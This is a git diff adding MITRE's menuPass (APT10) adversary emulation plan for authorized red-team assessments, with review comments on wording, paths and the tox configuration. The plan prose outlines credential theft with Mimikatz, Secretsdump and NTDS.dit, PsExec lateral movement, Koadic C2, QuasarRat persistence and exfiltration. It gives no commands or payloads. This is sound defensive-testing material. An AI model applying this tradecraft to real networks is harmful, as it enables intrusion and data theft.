+You may also assume breach by providing the emulation team with a VPN/RDP connection. menuPass is reported to have initially accessed MSP subscriber networks with elevated permissions, so too should the emulation team.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) [6](https://www.justice.gov/opa/press-release/file/1121706/download) [7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) [10](https://recordedfuture.com/apt10-cyberespionage-campaign/) [12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A) The intent of this scenario is to assess your organization's ability to protect, detect, and defend against execution, tool ingress, discovery, credential access, lateral movement, persistence, collection, and exfiltration and thereby encourage defense in depth. The YAML file does not address initial access. This procedure is left to the discretion of the emulation team.
+
+## Tool Ingress
+
+After establishing a point of presence on the target network, menuPass actors are commonly reported to have introduced an operational toolkit from attacker controlled infrastructure. This operational toolkit enables the attackers to pursue operational objectives and will enable the emulation team to pursue the subsequent steps in this scenario.
+
+## Discovery
+
+Once the operational toolkit has been introduced to the operating environment, the emulation team will conduct discovery with the intent of identifying opportunities while attempting to blend in with routine administrative tasks. The emulation team should enumerate the network and Active Directory (AD) with the intent of identifying opportunities for credential access and lateral movement. This is also the time to begin searching for systems of interest and identifying approaches to these systems.
+
+## Credential Access
+
+This objective should be pursued in parallel with discovery.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) Reporting suggests that the credentials used by menuPass to pivot into target networks provided elevated permissions. Other reporting details menuPass's use of exploits to achieve initial access. Some of these exploits may have resulted in code execution in an elevated context. In either case, the need for privilege escalation has been satisfied and the actors may instead, be interested in pursuing credential access in order to ensure freedom of movement throughout the domain.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) menuPass actors are thought to have compromised additional credentials using publicly available tools like Mimikatz and Secretsdump.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)
+
+## Lateral Movement
+
+After performing discovery and compromising additional credentials, the emulation team should attempt lateral movement to systems of interest using tools indicative of routine administrative tasks.
+
+menuPass is reported to have accessed remote systems by mounting remote network shares, using RDP to console into remote machines, and by using tools like PsExec to achieve remote code execution. menuPass actors are reported to have used these techniques to deploy their sustained malware to remote systems and subsequently establish C2.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) After C2 was established with the system of interest, menuPass actors are reported to have confirmed network connectivity and conducted situational awareness checks.
+
+## Collection and Staging
+
+After successfully establishing a point of presence on the remote system of interest, menuPass actors are then reported to have browsed the file system in search of information. This information was subsequently compressed and staged for exfiltration, often in the Recycle Bin.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)
+
+## Exfiltration
+
+The compressed archives are then reported to have been exfiltrated from the victim network by mounting a remote network share and copying the files out of the network or by using tools like Putty and/or Robocopy to transfer the data.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)
+
+---
+
+# Scenario 2
+
+Scenario 2 prescribes TTPs publicly attributed to menuPass that entail the pursuit of operational objectives using a command-and-control framework. This scenario is intended to assess your organization's ability to protect, detect, and defend to execution, discovery, privilege escalation, credential access, lateral movement, exfiltration, command and control, and persistence using a C2 framework. Amongst other tactical implants, menuPass is reported to have used Koadic C3. This publicly available C2 framework relies on Windows Scripting Host to conduct most of its operations. This tool will be used to pursue tactical objectives with the operational objective of exfiltrating/simulating exfiltration.
+
+## Initial Access
+
+menuPass is reported to have deployed tactical implants by spearphishing. Spearphishing emails attributed to menuPass typically featured a weaponized attachment that when opened, would exploit a vulnerability, direct the recipient to run an embedded macro, or click a link to download and execute a file. Each of these vectors were responsible for deploying menuPass malware and establishing command and control.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)
+
+## Execution
+
+If you have the resources to dedicate to emulating a phishing campaign, please do so. We have suggested an execution event that situates a tactical implant (Koadic C3) in memory and establishes C2. This implant will be used to accomplish the subsequent steps in this scenario.
+
+## Discovery
+
+After establishing C2, menuPass actors are reported to have conducted situational awareness checks by accessing the Windows command-line. You may also elect to conduct discovery with the intent of identifying systems of interest, staging points, and viable points of persistence.
+
+## Privilege Escalation
+
+In the event that the assessing team is unable to escalate privileges, this event can be “white-carded” with the granting of administrative rights to the compromised account. This white-carded event could enable the assessing team to escalate via credential access, as most of the credential access procedures described hereafter require elevated privileges. You may also elect to use Koadic's "elevate" modules to achieve execution in an elevated context.
+
+## Credential Access
+
+Much like Scenario 1, we will seek to access additional credentials to ensure freedom of movement. This step differs from credential access in Scenario 1 as we will be using our tactical implant to achieve credential access.
+
+In some instances, menuPass actors are reported to have copied and exfiltrated the Active Directory database file (NTDS.dit). This level of credential access ensures freedom of movement throughout the domain.
+
+## Lateral Movement and Exfiltration
+
+The credentials used in the previous step will be coupled with modules native to Koadic to move laterally to systems of interest and conduct exfiltration/simulate exfiltration.
+
+## C2 and Persistence
+
+menuPass is reported to have deployed sustained malware to strategic systems within the compromised environment to ensure long-term persistent access to the network.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) [6](https://www.justice.gov/opa/press-release/file/1121706/download) [7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) [10](https://recordedfuture.com/apt10-cyberespionage-campaign/) [12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A) In this step, we use Koadic and/or the Windows command-line to ingress sustained malware. menuPass is widely reported to have used the publicly available QuasarRat.
+
+---
+
+## Additional Plan Resources
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+ - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+ - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+ - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+ - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+ - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
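Review bot: the "Lateral Movement and Exfiltration" section says the operator will "conduct exfiltration/simulate exfiltration" without committing to either; since the README's Liability / Responsible Usage section restricts the content to authorized assessments, state here that exfiltration in the plan is simulated against staged test data (or say explicitly what is moved and where) so the assessing team and the defenders scoring the exercise read the step the same way. Two smaller points in the same hunk: the Privilege Escalation paragraph mixes curly quotes (“white-carded”) with straight quotes ("elevate"), and in "C2 and Persistence" the bracketed citations run straight into "In this step" with no sentence boundary after `[12](...)`; ending the citation run with a period or a line break would keep the two sentences apart.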
diff --git a/menuPass/README.md b/menuPass/README.md
new file mode 100644
index 00000000..5b261a0c
--- /dev/null
+++ b/menuPass/README.md
@@ -0,0 +1,43 @@
+# menuPass Adversary Emulation
+
+menuPass is thought to be motivated by collection objectives that align with Chinese national interests. The group's targeting is consistent with China's strategic objectives as stated in the Five-Year Plan (FYP) / Made in China 2025 Plan. While most of the group's targets have been located in the United States and Japan, the group has also been linked to intrusions in at least 12 other countries.
+
+The Intelligence Summary summarizes 32 publicly available sources to describe menuPass, their motivations, objectives, and observed target industries. It further describes the typical menuPass Operational Flow along with their publicly attributed Tactics, Techniques, and Procedures (TTPs) mapped to ATT&CK. In reviewing the plan, you may notice TTPs that do not currently map to the ATT&CK framework's menuPass group profile. This information has been provided to the ATT&CK team for analysis and potential incorporation.
+
+The Operations Flow chains techniques together into a logical flow of the major Steps that commonly occur across menuPass operations. At a macro level, the publicly available reporting attributed to menuPass can be organized into two categories. One being reporting specific to menuPass activities directed against MSP subscriber networks. The other being activity that generally was initiated by spearphishing and leveraged a command-and-control framework to achieve operational objectives. Thus, we have organized the menuPass emulation plan into two scenarios.
+
+- Scenario 1: This scenario is designed to emulate activity attributed to menuPass that is specific to the group's efforts targeting MSP subscriber networks. The intent of this scenario is to assess your organization's ability to protect, detect, and defend execution, tool ingress, discovery, credential access, lateral movement, persistence, collection, and exfiltration.
+- Scenario 2: This scenario is designed to emulate activity attributed to menuPass that entails the pursuit of operational objectives using a command-and-control framework. This scenario is intended to assess your organization's ability to protect, detect, and defend execution, discovery, privilege escalation, credential access, lateral movement, exfiltration, C2, and persistence using a command-and-control framework.
+
+The menuPass emulation plan is a human-readable, step-by-step / command-by-command implementation of menuPass TTPs. Structurally, the plan is organized into 2 scenarios, as defined in the Operations Flow. The human-readable plan is accompanied by a machine-readable plan implemented in YAML. The YAML includes all steps, commands, and syntax for Scenario 1. The YAML template was nuanced to ensure that each step within the YAML is directly coupled with its equivalent in the human-readable version.
+
+## Table of Contents
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+ - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+ - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+ - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+ - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+ - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
+
+## Liability / Responsible Usage
+
+This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research.
+
+## Notice
+
+Copyright 2021 MITRE Engenuity. Approved for public release. Document number CT0012.
+
+Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
+
+[http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)
+
+Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
+
+This project makes use of ATT&CK®
+
+[ATT&CK Terms of Use](https://attack.mitre.org/resources/terms-of-use/)
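Review bot: the paragraph describing the plan says "The YAML includes all steps, commands, and syntax for Scenario 1" right after stating the plan is organized into two scenarios, so readers will expect a machine-readable Scenario 2 and not find one; add a sentence saying why Scenario 2 is human-readable only (the Scenario 2 text above runs its steps through the Koadic C2 framework rather than stand-alone commands) or mark it as future work. Wording nits in the same paragraph: "The YAML template was nuanced to ensure" reads awkwardly, "adapted so that" says the same thing; and "two categories" versus "2 scenarios" should use one numeral style. Under "Notice", "This project makes use of ATT&CK®" lacks terminal punctuation.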
diff --git a/resources/README.md b/resources/README.md
index 731eec1b..fb99cfe8 100644
--- a/resources/README.md
+++ b/resources/README.md
@@ -2,7 +2,7 @@
This folder contains additional resources that may be utilized in conjunction with emulation plans in the [Adversary Emulation Library](/README.md). Each component is summarized below.
-### JSON Schema
+### JSON Schema
Schema used to validate Adversary Emulation Plan YAML files (e.g. [fin6.yaml](/fin6/Emulation_Plan/FIN6.yaml ))
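Review bot: the example link in the unchanged line, `[fin6.yaml](/fin6/Emulation_Plan/FIN6.yaml )`, is stale relative to this same change: the tox.ini hunk below validates `fin6/Emulation_Plan/yaml/FIN6.yaml`, so the path here should gain the `yaml/` directory, and the stray space before `)` should go while the line is touched. The hunk as written only strips trailing whitespace from the `### JSON Schema` heading.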
diff --git a/emulation_plan_structure.md b/structure/emulation_plan_structure.md
similarity index 77%
rename from emulation_plan_structure.md
rename to structure/emulation_plan_structure.md
index ca6bbd05..de53c823 100644
--- a/emulation_plan_structure.md
+++ b/structure/emulation_plan_structure.md
@@ -8,18 +8,18 @@ Each emulation plan is built based on the same structural components:
The following notional operations flow diagram outlines this structure:
-
+
## Additional Considerations
Each operations flow is designed based on what scenario(s) are being captured in the emulation from the cyber threat intelligence describing the target adversary's operational activity. Thusly, operational flows will be sequential but not always linear.
-
+
In this case, there is a loop between the third and fifth Steps (*Maintain Access* through *Pivot to New Victim*) before reaching the last Step in the Scenario.
We have also defined an additional, optional component of a **Phase** to capture groupings of Steps that can be interchanged.
-
+
In this case, the second Phase has two alternative Step options (*Steal Data* or *Destroy Data*) and creates two distinct Scenarios.
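Review bot: this file moves into `structure/` together with `notional_diagram.PNG`, `notional_diagram_loops.PNG` and `notional_diagram_phases.PNG` (renamed below in the same change), and the three changed lines in this hunk sit exactly where the diagram references belong; confirm each reference resolves from the new location, either as a plain relative filename next to the file or as a root-anchored `/structure/...` path, since the rename alone will not fix a reference that still points at the repository root. Nit in the context line: "Thusly" would read better as "Thus" and can be fixed while the file is being moved.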
diff --git a/format_dictionary.yaml b/structure/format_dictionary.yaml
similarity index 91%
rename from format_dictionary.yaml
rename to structure/format_dictionary.yaml
index b2dd438f..6e487181 100644
--- a/format_dictionary.yaml
+++ b/structure/format_dictionary.yaml
@@ -2,8 +2,8 @@
- emulation_plan_details:
id: UUID for the Procedure (e.g. b5192070-dff1-4134-bf66-c6b87c7498af)
- adversary_name: menuPass
- adversary_description: menuPass is thought to be a Chinese cyber espionage group associated with activity directed by elements of the PRC MSS.
+ adversary_name: Adversary
+ adversary_description: Adversary Description
attack_version: Version of ATT&CK in which the plan was developed
format_version: YAML format version
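Review bot: the new placeholder values `adversary_name: Adversary` and `adversary_description: Adversary Description` break the convention used by every other field in this dictionary, where the value describes what belongs there (for example `attack_version: Version of ATT&CK in which the plan was developed`); suggest `adversary_name: Name of the adversary group as used in the plan (e.g. menuPass)` and `adversary_description: One- or two-sentence description of the adversary`, which also keeps the menuPass example that was removed as a concrete illustration rather than a hard-coded value.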
@@ -21,12 +21,12 @@
cti_source: Reference (link, description, etc.) to a specific CTI data source such as a threat report or file
procedure_group: A unique name for a group of Procedures
procedure_step: A unique step ID for this TTP. Can be used to create sequences of TTPs.
- platforms: #(Empty)
+ platforms: #(Empty)
platform_name: #(Empty/Variable e.g. windows, linux, darwin)
executor_name: #(Empty/Variable e.g. cmd, psh, pwsh, sh)
command: |
The command or data to provide to that executor
- payloads:
+ payloads:
- The name of a file to use as a payload for the executor
# Multiple input arguments may be specified and referenced elsewhere using the format #{argument_name}
@@ -42,7 +42,7 @@
- description: Description of the dependency command
prereq_command: A validation command to execute as a prerequisite to this Procedure that checks that all dependencies are met
get_prereq_command: A command that ensures all payloads and arguments are available before executing the validation command
-
+
# Additional execution methods for the Procedure may be provided through executors
# Multiple executors may be specified
executors:
diff --git a/notional_diagram.PNG b/structure/notional_diagram.PNG
similarity index 100%
rename from notional_diagram.PNG
rename to structure/notional_diagram.PNG
diff --git a/notional_diagram_loops.PNG b/structure/notional_diagram_loops.PNG
similarity index 100%
rename from notional_diagram_loops.PNG
rename to structure/notional_diagram_loops.PNG
diff --git a/notional_diagram_phases.PNG b/structure/notional_diagram_phases.PNG
similarity index 100%
rename from notional_diagram_phases.PNG
rename to structure/notional_diagram_phases.PNG
diff --git a/tox.ini b/tox.ini
index 853c8f32..a6bc07af 100644
--- a/tox.ini
+++ b/tox.ini
@@ -1,5 +1,5 @@
[tox]
-envlist = fin6
+envlist = emu_lib
skipsdist = True
[testenv]
@@ -7,10 +7,12 @@ deps =
jsonschema
ruamel.yaml
-[testenv:fin6]
+[testenv:emu_lib]
commands =
- python resources/plan_validator.py fin6/Emulation_Plan/FIN6.yaml -schema_document resources/format_schema.json
+ python resources/plan_validator.py fin6/Emulation_Plan/yaml/FIN6.yaml -schema_document resources/format_schema.json
+ python resources/plan_validator.py apt29/Emulation_Plan/yaml/APT29.yaml -schema_document resources/format_schema.json
+ python resources/plan_validator.py menuPass/Emulation_Plan/yaml/menupass.yaml -schema_document resources/format_schema.json
[travis]
python =
- 3.8: fin6
+ 3.8: emu_lib
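Review bot: the menuPass validator command uses a lower-case file name, `menuPass/Emulation_Plan/yaml/menupass.yaml`, while the other two plans use the upper-case group name (`FIN6.yaml`, `APT29.yaml`); on the case-sensitive filesystems CI runs on, the command fails if the committed file is named differently, so confirm the case matches the file in `menuPass/Emulation_Plan/yaml/` (the README in this change links only the directory) and consider naming it `menuPass.yaml` for consistency. The `envlist` rename to `emu_lib` is carried through to `[testenv:emu_lib]` and the `[travis]` mapping, which is correct; since each new plan now requires another copy of the same command, a small driver script or a loop over `*/Emulation_Plan/yaml/*.yaml` would let new plans be validated without editing tox.ini.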